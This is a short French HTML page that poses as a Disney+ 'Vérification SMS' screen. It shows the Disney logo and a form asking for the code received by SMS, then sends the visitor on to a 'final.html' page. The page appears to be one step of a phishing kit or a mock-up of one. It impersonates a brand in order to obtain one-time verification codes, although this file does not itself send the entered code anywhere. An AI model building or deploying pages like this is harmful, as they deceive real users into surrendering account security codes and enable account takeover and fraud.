<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Validation SMS | Disney+</title>
  <link rel="stylesheet" href="style.css" />
</head>
<body>
  <header><img src="Images/logo-disney.png" class="logo" /></header>
  <main class="form-container">
    <h1>Vérification SMS</h1>
    <form onsubmit="event.preventDefault(); window.location.href='final.html';">
      <input type="text" placeholder="Code reçu par SMS" required />
      <button type="submit">Valider</button>
    </form>
  </main>
</body>
</html>